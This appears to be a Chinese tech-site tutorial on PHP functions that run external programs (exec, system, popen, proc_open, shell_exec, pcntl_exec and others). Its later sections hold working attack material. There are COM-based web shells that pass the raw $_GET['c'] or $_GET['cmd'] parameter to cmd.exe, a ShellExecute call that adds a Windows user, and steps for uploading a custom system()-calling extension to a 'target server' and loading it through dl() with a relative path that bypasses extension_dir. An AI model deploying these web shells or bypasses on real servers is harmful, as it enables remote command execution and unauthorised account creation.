主頁 > 知識庫 > PHP調(diào)用外部程序的方法解析

PHP調(diào)用外部程序的方法解析
熱門標簽:安裝電銷外呼系統(tǒng) 百度商鋪地圖標注 福州人工外呼系統(tǒng)哪家強 釘釘打卡地圖標注 地圖標注平臺怎么給錢注冊 常州地圖標注服務(wù)商 衡水外呼系統(tǒng)平臺 新河科技智能外呼系統(tǒng)怎么樣 注冊400電話申請

很多情況下需要php調(diào)用其他程序如shell命令、shell腳本、可執(zhí)行程序等等,此時需要使用到諸如exec/system/popen/proc_open等函數(shù),每種函數(shù)有各自適合使用的場景以及需要注意的地方。

前提:PHP沒有運行在安全模式

如果PHP運行在安全模式下,那么在執(zhí)行外部命令、打開文件、連接數(shù)據(jù)庫、基于HTTP的認證這4個方面將會受到制約,可能在調(diào)用外部程序時無法獲取預(yù)期的結(jié)果,此時需要設(shè)置特定目錄,可以在php.ini中編輯safe_mode_exec_dir參數(shù)來指定。

1. exec

原型:string exec ( string command [, array output [, int return_var]] )
描述:返回值保存最后的輸出結(jié)果,而所有輸出結(jié)果將會保存到$output數(shù)組,$return_var用來保存命令執(zhí)行的狀態(tài)碼(用來檢測成功或失敗)。
例子:$ret = exec("ls -al", $output, $var);
注意:
A. 輸出結(jié)果會逐行追加到$output中,因此在調(diào)用exec之前需要unset($output),特別是循環(huán)調(diào)用的時候。
B. 如果想通過exec調(diào)用外部程序后馬上繼續(xù)執(zhí)行后續(xù)代碼,僅僅在命令里加""是不夠的,此時exec依然會等待命令執(zhí)行完畢;需要再將標準輸出做重定向才可以,例如:exec("ls -al >/dev/null ", $output, $var);
C. 要學會善用EscapeShellCmd()和EscapeShellArg()。函數(shù)EscapeShellCmd把一個字符串 中所有可能瞞過Shell而去執(zhí)行另外一個命令的字符轉(zhuǎn)義。這些字符在Shell中是有特殊含義的,象分號(|),重定向(>)和從文件讀入 ()等。函數(shù)EscapeShellArg是用來處理命令的參數(shù)的。它在給定的字符串兩邊加上單引號,并把字符串中的單引號轉(zhuǎn)義,這樣這個字符串 就可以安全地作為命令的參數(shù)。

2. system

原型:string system ( string command [, int return_var] )
描述:執(zhí)行給定的命令,返回最后的輸出結(jié)果;第二個參數(shù)是可選的,用來得到命令執(zhí)行后的狀態(tài)碼。
例子:$ret = system("ls -al", $var);
注意:略。

3. passthru

原型:void passthru (string command [, int return_var])
描述:執(zhí)行給定的命令,但不返回任何輸出結(jié)果,而是直接輸出到顯示設(shè)備上;第二個參數(shù)可選,用來得到命令執(zhí)行后的狀態(tài)碼。
例子:passthru("ls -al", $var);
注意:略。

4. popen

原型:resource popen ( string command, string mode )
描述:打開一個指向進程的管道,該進程由派生給定的 command 命令執(zhí)行而產(chǎn)生。 返回一個和 fopen() 所返回的相同的文件指針,只不過它是單向的(只能用于讀或?qū)懀┎⑶冶仨氂?pclose() 來關(guān)閉。此指針可以用于 fgets(),fgetss() 和 fwrite()。 
例子:$fd = popen("command", 'r'); $ret = fgets($fd);
注意:只能打開單向管道,不是'r'就是'w';并且需要使用pclose()來關(guān)閉。

5. proc_open

原型:resource proc_open ( string cmd, array descriptorspec, array pipes [, string cwd [, array env [, array other_options]]] )
描述:與popen類似,但是可以提供雙向管道。具體的參數(shù)讀者可以自己翻閱資料,比如該博客: http://hi.baidu.com/alex_wang58/blog/item/a28657de16fec55195ee372a.html。
注意:
A. 后面需要使用proc_close()關(guān)閉資源,并且如果是pipe類型,需要用pclose()關(guān)閉句柄。
B. proc_open打開的程序作為php的子進程,php退出后該子進程也會退出。
C.  筆者在使用的時候遇到獲取外部程序輸出阻塞的問題,也就是在例子中的fgets($pipes[1])語句阻塞了,無法繼續(xù)進行。經(jīng)過多方查證后發(fā)現(xiàn),問題一般出在外部程序中,比如外部程序是C程序,使用fprintf(stdin, "**** \n");輸出結(jié)果,此時需要加上fflush(stdout);才行,否則輸出結(jié)果可能會暫留緩存中,無法真正輸出,而php也就無法獲取輸出了。
例子:

 // / 打開管道
 $pwd   =   " ***** " ;
 $pipes   =   array ();
 $command   =   " ***** " ;
 $desc   =   array ( array ( ' pipe ' ,   ' r ' ) ,   array ( ' pipe ' ,   ' w ' ) ,   array ( ' pipe ' ,   ' w ' ));
 $handle   =   proc_open ( $command ,   $desc ,   $pipes ,   $pwd );
 if  ( ! is_resource ( $handle )) {
     fprintf (STDERR ,   " proc_open failed.\n " );
     exit ( 1 );
}
 // / 讀寫
 fwrite ( $pipes [ 0 ] ,   " *****\n " );
 $ret   =   rtrim ( fgets ( $pipes [ 1 ]) ,   " \n " );
 // / 關(guān)閉管道
 fclose ( $pipes [ 0 ]);
 fclose ( $pipes [ 1 ]);
 fclose ( $pipes [ 2 ]);
 proc_close ( $handle );

6. shell_exec

原型:string shell_exec ( string $cmd )
描述:cmd:要執(zhí)行的命令    返回值:命令執(zhí)行的輸出。 如果執(zhí)行過程中發(fā)生錯誤或者進程不產(chǎn)生輸出,則返回 NULL。
例子:

?php
        echo shell_exec('pwd');
?>

執(zhí)行結(jié)果:/var/www/html

7. 反撇號`

描述:shell_exec() 函數(shù)實際上僅是反撇號 (`) 操作符的變體 

例子:

?php
        echo `pwd`;
?>

執(zhí)行結(jié)果:/var/www/html

8.cntl_exec

原型:void pcntl_exec ( string $path [, array $args [, array $envs ]] )
描述:(PHP 4 >= 4.2.0, PHP 5, PHP 7)
pcntl_exec — 在當前進程空間執(zhí)行以給定參數(shù)執(zhí)行指定程序。
pcntl是linux下的一個擴展,可以支持php的多線程操作。
參數(shù):
path: 必須是可執(zhí)行二進制文件路徑或一個在文件第一行指定了一個可執(zhí)行文件路徑
標頭的腳本(比如文件第一行是#!/usr/local/bin/perl的perl腳本)。 更多的
信息請查看您系統(tǒng)的execve(2)手冊。
args: 一個要傳遞給程序的參數(shù)的字符串數(shù)組。
envs: 一個要傳遞給程序作為環(huán)境變量的字符串數(shù)組。這個數(shù)組是 key => value格
式的,key代表要傳遞的環(huán)境變量的名稱,value代表該環(huán)境變量值。
返回值:當發(fā)生錯誤時返回 FALSE ,沒有錯誤時沒有返回。

9. COM組建(針對windwos環(huán)境下使用com組建)

原型:
Wscript.Shell->exec(command) //
Shell.Application->ShellExecute(appName,appArgs,appPath) //
Shell.Application->open(appPath) //要填寫程序絕對路徑,并且應(yīng)該沒有辦法加參數(shù)
Shell.Application->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverb()
Shell.Application->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverbEx()
描述:在windwos下,并且在php中開啟com組建擴展之后可以使用這種方法(打開方式自行百度)
徹底的解決方案是 直接刪除System32目錄下wshom.ocx文件
例子:

?php
$phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!"); 
$exec=$phpwsh->exec("cmd.exe /c ".$_GET['c'].""); 
$stdout = $exec->StdOut(); 
$stroutput = $stdout->ReadAll(); 
echo $stroutput; 
?>
 
?php
$phpwsh=new COM("Shell.Application") or die("Create Wscript.Shell Failed!"); 
$exec=$phpwsh->ShellExecute("net"," user tiny tiny /add");
//$exec=$phpwsh->ShellExecute("cmd","/c net user tiny tiny /add");
?>
 
?php
$phpwsh=new COM("Shell.Application") or die("Create Wscript.Shell Failed!"); 
$exec=$phpwsh->open("c:\\windows\\system32\\cmd.exe");
?>
 
?php
$a=new COM("Shell.Application");
$a->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverb();
?>
 
?php
$a=new COM("Shell.Application");
$a->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverbEx();
?>

10.  dl()

要求:php沒有開啟安全模式,并且enable_dl選項為on,并且php版本支持dl函數(shù)
(在 PHP 5.3 里,此函數(shù)被某些 SAPI 移除了,也就是沒有這個函數(shù)?)
說明:extension_dir選項可以指定擴展模塊的目錄,但是我們可以使用相對路徑的方式繞過
原理:自己編寫擴展,然后使用dl加載此擴展。
舉例(linux):
準備工作:
自行上網(wǎng)下載apache和相近版本的php源碼,按照apache和php的官方文檔進行安裝。
我們主要需要三個文件:phpize,php-config和ext_skel:在正確安裝好了apache和php之后,
phpize和php-config將被安裝(可以自行find),而ext_skel則是是在php源碼中的ext目錄中。
ext_skel是php源碼包中的用來幫助制作擴展的程序。
1)轉(zhuǎn)到php-x.x.xx/ext中首先新建xxx.skel文件,里面填寫要制作的擴展中的函數(shù)原型,例如:
string exec(string str)
2)執(zhí)行命令:./ext_skel --extname=tinymin --proto=xxx.skel 之后便生成了tinymin目錄,
里面則是擴展所需要的文件
3)cd tinymin
4)vi config.m4 
將 config.m4文件里面
dnl PHP_ARG_WITH(myext, for myext support,
dnl Make sure that the comment is aligned:
dnl [ --with-myext Include myext support])
修改成
PHP_ARG_WITH(myext, for myext support,
[ --with-myext Include myext support])
5)vi tinymin.c
將PHP_FUNCTION(exec)后面的大括號里面的代碼的最后一行刪除,并寫上自己的代碼,修改后如:PHP_FUNCTION(haha)
{
char *str = NULL;
int argc = ZEND_NUM_ARGS();
int str_len;


if (zend_parse_parameters(argc TSRMLS_CC, "s", str, str_len) == FAILURE) 
return;


return system(str);
}
6)找到phpize:find / -name "phpize" 然后運行一下phpize:
/my_lamp/php/bin/phpize
7) 同樣方式找到php-config,然后運行configure:
./configure --with-php-config=/my_lamp/php/bin/php-config
8)makemake install 
之后便在自己的php擴展目錄中生成了擴展tinymin.so
在目標服務(wù)器上面上傳tinymin.so(不一定要在它的php擴展目錄中,因為可以使用相對路徑)
用法例如:
?php
dl("../../../../../tmp/tinymin.so");
echo exec($_GET['cmd']);
?>
這種方法也很老了,我在自己的的kali2上面嘗試這樣做的時候提示沒有dl這個函數(shù),具體原因參見php manual
windows上應(yīng)該也是一樣的原理。不過沒有試過

11.  內(nèi)核變量

網(wǎng)址:http://www.freebuf.com/articles/web/82801.html 

以上就是PHP調(diào)用外部程序的方法解析的詳細內(nèi)容,更多關(guān)于PHP調(diào)用外部程序的方法的資料請關(guān)注腳本之家其它相關(guān)文章!

您可能感興趣的文章:
  • PHP實現(xiàn)執(zhí)行外部程序的方法詳解
  • PHP實現(xiàn)函數(shù)內(nèi)修改外部變量值的方法示例
  • PHP 閉包獲取外部變量和global關(guān)鍵字聲明變量的區(qū)別講解
  • php外部執(zhí)行命令函數(shù)用法小結(jié)
  • PHP中如何防止外部惡意提交調(diào)用ajax接口
  • PHP用反撇號執(zhí)行外部命令
  • php繪圖之加載外部圖片的方法
  • yiic命令時提示“php.exe”不是內(nèi)部或外部命令的解決方法
  • PHP實現(xiàn)刪除非站內(nèi)外部鏈接實例代碼
  • php判斷正常訪問和外部訪問的示例
  • PHP 執(zhí)行系統(tǒng)外部命令 system() exec() passthru()

標簽:克拉瑪依 柳州 唐山 遼陽 鶴崗 鷹潭 白城 六安

巨人網(wǎng)絡(luò)通訊聲明:本文標題《PHP調(diào)用外部程序的方法解析》,本文關(guān)鍵詞  PHP,調(diào)用,外部,程序,的,方法,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《PHP調(diào)用外部程序的方法解析》相關(guān)的同類信息!
  • 本頁收集關(guān)于PHP調(diào)用外部程序的方法解析的相關(guān)信息資訊供網(wǎng)民參考!
    • 推薦文章